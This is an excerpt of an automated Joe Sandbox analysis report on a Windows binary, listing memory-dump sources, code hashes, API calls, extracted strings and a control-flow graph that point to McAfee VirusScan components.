                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: EntryFunctionLookup
                                                    • String ID:
                                                    • API String ID: 3852435196-0
                                                    • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                    • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                    • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                    • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                    • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                    • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                    • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                    • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                    • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                    • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                    • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                    • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                    • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                    • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                    • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                    • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                    • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                    • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                    • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                    • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                    • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                    • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                    • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                    • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                    • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                    • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                    • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                    • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                    • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                    • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                    • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                    • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                    • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                    • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                    • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                    • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                    • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction ID: 2fbe4ee90b777e7bfefcc9d2a703f6ad8f70e17fa963f78ee7627a0a0bfc46c4
                                                    • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction Fuzzy Hash: 6EF068767292958ADB96CF29A552B2977D1E748780F94803DD58D83B04D63C94608F08

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                    • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                    • API String ID: 1021822269-3147033232
                                                    • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                    • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                    • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                    • API String ID: 883923345-381368982
                                                    • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                    • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                    • String ID:
                                                    • API String ID: 1613947383-0
                                                    • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                    • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                    • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                    • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                    • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 93015348-1041928032
                                                    • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                    • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                    • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                    • API String ID: 3682727354-300733478
                                                    • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                    • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
